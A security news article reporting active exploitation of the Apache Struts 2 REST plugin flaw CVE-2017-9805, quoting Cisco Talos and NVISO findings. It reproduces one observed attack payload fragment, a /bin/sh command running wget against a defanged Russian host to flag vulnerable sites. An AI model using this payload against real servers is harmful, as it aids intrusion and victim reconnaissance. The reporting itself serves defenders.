Experts observed the active exploitation of the CVE-2017-9805 Struts vulnerability

Hackers are exploiting in the wild a critical remote code execution vulnerability in Apache Struts 2, tracked as CVE-2017-9805, that was patched a few days ago.

The vulnerability tracked as CVE-2017-9805 is related to the way Struts deserializes untrusted data, it affects all versions of Apache Struts since 2008, from Struts 2.5 to Struts 2.5.12.

The experts warn that the Struts REST communication plugin fails to handle XML payloads while deserializing them, all web applications using this plugin are vulnerable to remote attacks.

The company Lgtm, who discovered the CVE-2017-9805 vulnerability, warned that at least 65 percent of Fortune 100 companies use Struts and they could all be exposed to remote attacks due to this vulnerability.

The Apache Struts development team acknowledge the vulnerability and published a patch.

An exploit and a Metasploit module to trigger the CVE-2017-9805 vulnerability were created released shortly after its disclosure.

The experts at security firm Contrast Security said that less than one percent of Java applications used by its customers use the flawed REST plugin.

“This vulnerability only affects applications that use Struts 2 as well as the Struts 2 REST Plugin. ZDNet, amongst others, are overestimating the prevalence of the vulnerability [2] because they assume that everyone using Struts 2 is also using the Struts 2 REST Plugin. We identified less than 1% of the Java applications we’re in charge of assessing and protecting using Struts 2 REST Plugin.” reads the blog post published by Contrast Security. “The metrics available on Maven show that the Struts 2 Core library has 167 downstream consumers [6], while the Struts 2 REST Plugin library has 9 [7] which indicates its volume of usage.” 

Researchers from Cisco Talos and NVISO Labs have already spotted attacks aimed to find vulnerable servers leveraging a Russian website used to send the requests and collect the results.

“we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. Below is a sample of the type of HTTP requests we have been observing.

<string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite</string>

This would initiate a wget request that would write the contents of the HTTP response to /dev/null. This indicates it is purely a scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack.” wrote Cisco Talos.

Below the request observed by NVISO experts:

“The POST request to /struts2-rest-showcase/orders/3 allowed us initially to detect this attempt.” reads the post published by Nviso experts.

“The packet capture shows that this is a full exploit attempt for reconnaissance purposes: the payload is a /bin/sh command to execute a silent wget command to a compromised Russian website (it includes the name of the scanned site as query). The downloaded content is discarded.”

Researchers at Cisco Talos also reported attacks aimed to deliver a potentially malicious file.

“The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues. ” continues Cisco.

“Within 48 hours of disclosure we were seeing systems activity exploiting the vulnerability. To their credit the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today’s reality you no longer have weeks or months to respond to these type of vulnerabilities, it’s now down to days or hours and every minute counts.”

Cisco is currently assessing its products to discover the real impact of the flaw.

[adrotate banner=”9″]

Pierluigi Paganini

(Security Affairs – Struts, CVE-2017-9805 RCE)

[adrotate banner=”12″]